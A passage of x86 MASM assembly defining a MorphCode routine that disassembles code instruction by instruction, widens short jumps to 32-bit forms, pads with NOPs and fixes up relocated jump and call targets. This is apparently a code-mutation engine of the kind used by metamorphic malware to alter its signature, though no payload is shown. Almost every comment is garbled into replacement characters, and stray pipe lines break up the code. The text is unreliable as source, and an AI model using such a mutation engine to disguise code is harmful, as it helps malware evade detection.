; OUT EAX - <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> |
|
|||
|
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::|
|
|||
|
MorphCode proc dwCodeAddress : DWORD, dwOutputBuffer : DWORD
|
|||
|
local pOpcodes : DWORD
|
|||
|
local dwTotalCodeSize : DWORD
|
|||
|
|
|||
|
;::::::::::::::::::::::::::::::::::::::::::::::::::
|
|||
|
; pOpcodes - <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> ::
|
|||
|
; dwOutputBuffer - <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> ::
|
|||
|
;::::::::::::::::::::::::::::::::::::::::::::::::::
|
|||
|
|
|||
|
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
invoke VirtualAlloc, NULL, 1024*1024, MEM_COMMIT + MEM_RESERVE, PAGE_READWRITE
|
|||
|
mov pOpcodes, eax
|
|||
|
|
|||
|
;::::::::::::::::::::::::::::::::::::::::::::
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>
|
|||
|
push 0
|
|||
|
pop dwTotalCodeSize
|
|||
|
|
|||
|
;:::::::::::::::::::::::::::::::::::::::::
|
|||
|
; <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
assume ecx : ptr _OPCODE
|
|||
|
mov esi, dwCodeAddress ; Code Address
|
|||
|
mov edi, dwOutputBuffer ; New Code Address
|
|||
|
mov ecx, pOpcodes ; array of _OPCODES
|
|||
|
;::::::::::::::::::::::::::::::::::::::::
|
|||
|
|
|||
|
|
|||
|
|
|||
|
;::::::::::::::::::::::::::::::::::::::::
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> :::::::::::::::::::::::::::
|
|||
|
;::::::::::::::::::::::::::::::::::::::::
|
|||
|
|
|||
|
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20> EDI
|
|||
|
mov [ecx].dwNewAddress, edi
|
|||
|
|
|||
|
;::::::::::::::::::::::::::::::::::::
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>
|
|||
|
; Loop 1
|
|||
|
@_loop_1:
|
|||
|
|
|||
|
;::::::::::::::::::::::::::::::::::::
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; IN ESI == Current Code Offset
|
|||
|
; OUT EAX == Instruction Length
|
|||
|
call c_Catchy
|
|||
|
|
|||
|
;:::::::::::::::::::::::::::::::::::::
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
mov [ecx].dwOldAddress, esi
|
|||
|
mov [ecx].dwLength, eax
|
|||
|
|
|||
|
;::::::::::::::::::::::::::::::::::::
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> 00Fh
|
|||
|
; <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> +10h <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>:
|
|||
|
; <20><><EFBFBD><EFBFBD> :00000000: 74 30
|
|||
|
; 0F +10 30 00 00 00
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD>:00000000: 0F 84 30 00 00 00
|
|||
|
cmp byte ptr [esi], 070h
|
|||
|
jl @F
|
|||
|
cmp byte ptr [esi], 07Fh
|
|||
|
ja @F
|
|||
|
push eax
|
|||
|
mov al, 00Fh
|
|||
|
stosb
|
|||
|
|
|||
|
movzx eax, byte ptr [esi]
|
|||
|
add eax, 10h
|
|||
|
stosd
|
|||
|
|
|||
|
;:::::::::::::::::::::::::::::::::::::::
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
push esi
|
|||
|
call get_jump_address
|
|||
|
|
|||
|
;::::::::::::::::::::::::
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
mov [ecx].dwJumpAddress, eax
|
|||
|
|
|||
|
pop eax
|
|||
|
|
|||
|
;::::::::::::::::::::::::::::::::::::
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> 00Fh XXh imm32, <20>.<2E>. <20><><EFBFBD><EFBFBD><EFBFBD> 6
|
|||
|
; <20><><EFBFBD> XX <20> [80h..8Fh]
|
|||
|
add dwTotalCodeSize, 6
|
|||
|
;::::::::::::::::::::::::::::::::::::
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
jmp @_next_inst_
|
|||
|
|
|||
|
@@:
|
|||
|
;::::::::::::::::::::::::::::::::::::
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>...
|
|||
|
; JMP imm8 -> JMP imm32
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD><EFBFBD> : 00000000: EB 33
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD>: 00000000: E9 33 00 00 00
|
|||
|
cmp byte ptr [esi], 0EBh
|
|||
|
jne @F
|
|||
|
push eax
|
|||
|
|
|||
|
mov al, 0E9h
|
|||
|
stosb
|
|||
|
xor eax, eax
|
|||
|
stosd
|
|||
|
|
|||
|
;:::::::::::::::::::::::::::::::::::::::
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
push esi
|
|||
|
call get_jump_address
|
|||
|
|
|||
|
;::::::::::::::::::::::::
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
mov [ecx].dwJumpAddress, eax
|
|||
|
|
|||
|
pop eax
|
|||
|
;:::::::::::::::::::::::::::::::
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> E9 imm32, <20>.<2E>. <20><><EFBFBD><EFBFBD><EFBFBD> 5
|
|||
|
add dwTotalCodeSize, 5
|
|||
|
jmp @_next_inst_
|
|||
|
;::::::::::::::::::::::::::::::::::::
|
|||
|
|
|||
|
|
|||
|
@@:
|
|||
|
;::::::::::::::::::::::::::::::::::::
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> JMP imm32
|
|||
|
cmp byte ptr [esi], 0E9h
|
|||
|
jne @F
|
|||
|
|
|||
|
push eax
|
|||
|
push esi
|
|||
|
call get_jump_address
|
|||
|
mov [ecx].dwJumpAddress, eax
|
|||
|
pop eax
|
|||
|
jmp @_replace_instr_
|
|||
|
;::::::::::::::::::::::::::::::::::::
|
|||
|
|
|||
|
@@:
|
|||
|
;::::::::::::::::::::::::::::::::::::
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> CALL
|
|||
|
cmp byte ptr [esi], 0E8h
|
|||
|
jne @F
|
|||
|
|
|||
|
push eax
|
|||
|
push esi
|
|||
|
call get_jump_address
|
|||
|
mov [ecx].dwJumpAddress, eax
|
|||
|
pop eax
|
|||
|
jmp @_replace_instr_
|
|||
|
;::::::::::::::::::::::::::::::::::::
|
|||
|
|
|||
|
|
|||
|
@@:
|
|||
|
;::::::::::::::::::::::::::::::::::::
|
|||
|
; 00Fh XX imm32
|
|||
|
cmp byte ptr [esi], 00Fh
|
|||
|
jne @F
|
|||
|
cmp byte ptr [esi + 1], 080h
|
|||
|
jl @F
|
|||
|
cmp byte ptr [esi + 1], 08Fh
|
|||
|
ja @F
|
|||
|
push eax
|
|||
|
push esi
|
|||
|
call get_jump_address
|
|||
|
mov [ecx].dwJumpAddress, eax
|
|||
|
pop eax
|
|||
|
;::::::::::::::::::::::::::::::::::::
|
|||
|
|
|||
|
@@:
|
|||
|
|
|||
|
@_replace_instr_:
|
|||
|
;::::::::::::::::::::::::::::::::::::::::::
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>.
|
|||
|
; <20><><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD><EFBFBD> <20><> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
push esi
|
|||
|
push ecx
|
|||
|
|
|||
|
mov ecx, eax
|
|||
|
rep movsb
|
|||
|
|
|||
|
pop ecx
|
|||
|
pop esi
|
|||
|
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
add dwTotalCodeSize, eax
|
|||
|
|
|||
|
;::::::::::::::::::::::::::::::::::::
|
|||
|
; <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD>
|
|||
|
@_next_inst_:
|
|||
|
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> NOP
|
|||
|
; <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> "<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>" <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD><EFBFBD>:
|
|||
|
;--------------
|
|||
|
; push eax
|
|||
|
; pop eax
|
|||
|
;--------------
|
|||
|
; mov eax, eax
|
|||
|
;--------------
|
|||
|
; <20> <20>.<2E>.
|
|||
|
push eax
|
|||
|
mov al, 90h
|
|||
|
stosb
|
|||
|
pop eax
|
|||
|
|
|||
|
;:::::::::::::::::::::::::::::::::::::::::::::::::::::::::
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><> 1 (<28><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> NOP)
|
|||
|
; <20><><EFBFBD> <20><> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> "<22><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>" <20><><EFBFBD>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> dwTotalCodeSize <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>(!)
|
|||
|
add dwTotalCodeSize, 1
|
|||
|
|
|||
|
;::::::::::::::::::::::::::::::::::::
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
add esi, eax
|
|||
|
|
|||
|
;::::::::::::::::::::::::::::::::::::
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
add ecx, sizeof _OPCODE
|
|||
|
|
|||
|
;::::::::::::::::::::::::::::::::::::
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
mov [ecx].dwNewAddress, edi
|
|||
|
|
|||
|
|
|||
|
;::::::::::::::::::::::::::::::::::::
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> int 3
|
|||
|
; <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>....
|
|||
|
; <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>.
|
|||
|
cmp byte ptr [esi], 0CCh
|
|||
|
jne @_loop_1
|
|||
|
; End Loop 1
|
|||
|
;::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::::
|
|||
|
|
|||
|
;::::::::::::::::::::::::::::::::::::
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
mov [ecx].dwOldAddress, 0
|
|||
|
|
|||
|
|
|||
|
|
|||
|
|
|||
|
;::::::::::::::::::::::::::::::::::::::::
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> :::::::::::::::::::::::::::
|
|||
|
;::::::::::::::::::::::::::::::::::::::::
|
|||
|
mov ecx, pOpcodes
|
|||
|
@_loop_2:
|
|||
|
;::::::::::::::::::::::::::::::::::::::::
|
|||
|
; <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><> dwJumpAddress != 0 (!)
|
|||
|
cmp [ecx].dwJumpAddress, 0
|
|||
|
je @F
|
|||
|
;::::::::::::::::::::::::::::::::::::::::
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
push pOpcodes
|
|||
|
push [ecx].dwJumpAddress
|
|||
|
call get_new_jump_address
|
|||
|
|
|||
|
;::::::::::::::::::::::::::::::::::::::::
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD>.
|
|||
|
; <20><> <20><><EFBFBD><EFBFBD> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD> EAX (<28><><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD> <20><><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> dwCodeAddress <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>)
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD>
|
|||
|
; <20> <20><><EFBFBD> 2 <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>, <20><> <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> :)))
|
|||
|
cmp eax, 0
|
|||
|
je @F
|
|||
|
;::::::::::::::::::::::::::::::::::::::::
|
|||
|
|
|||
|
;::::::::::::::::::::::::::::::::
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
mov edx, [ecx].dwNewAddress
|
|||
|
;:::::::::::::::::::::::::
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; 00Fh XXh imm32
|
|||
|
cmp byte ptr [edx], 00Fh
|
|||
|
je @_0F_XX_imm32
|
|||
|
;:::::::::::::::::::::::::::
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; JMP imm32
|
|||
|
cmp byte ptr [edx], 0E9h
|
|||
|
je @_XXX_imm32_
|
|||
|
;::::::::::::::::::::::
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD> (CALL imm32)
|
|||
|
cmp byte ptr [edx], 0E8h
|
|||
|
je @_XXX_imm32_
|
|||
|
;::::::::::::::::::::::
|
|||
|
jmp @F
|
|||
|
|
|||
|
;::::::::::::::::::::::::::::::::::::::
|
|||
|
; 00Fh XXh imm32
|
|||
|
; <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> imm32
|
|||
|
; <20><><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> <20><> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> [<5B><><EFBFBD><EFBFBD><EFBFBD> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD> + 2]
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD>:
|
|||
|
; 00Fh 84 imm32 ; JE imm32
|
|||
|
; 00Fh 85 imm32 ; JNE imm32
|
|||
|
@_0F_XX_imm32:
|
|||
|
cmp eax, [ecx].dwNewAddress
|
|||
|
jle @_less_or_equal_1
|
|||
|
push eax
|
|||
|
sub eax, [ecx].dwNewAddress
|
|||
|
sub eax, 6
|
|||
|
mov edx, [ecx].dwNewAddress
|
|||
|
mov dword ptr [edx + 2], eax
|
|||
|
pop eax
|
|||
|
jmp @F
|
|||
|
|
|||
|
@_less_or_equal_1:
|
|||
|
push eax
|
|||
|
mov edx, [ecx].dwNewAddress
|
|||
|
sub edx, eax
|
|||
|
neg edx
|
|||
|
sub edx, 6
|
|||
|
mov eax, [ecx].dwNewAddress
|
|||
|
mov dword ptr [eax + 2], edx
|
|||
|
pop eax
|
|||
|
jmp @F
|
|||
|
|
|||
|
;:::::::::::::::::::::::::::::::::::::::::::::
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> imm32 <20> <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD> JMP <20> CALL
|
|||
|
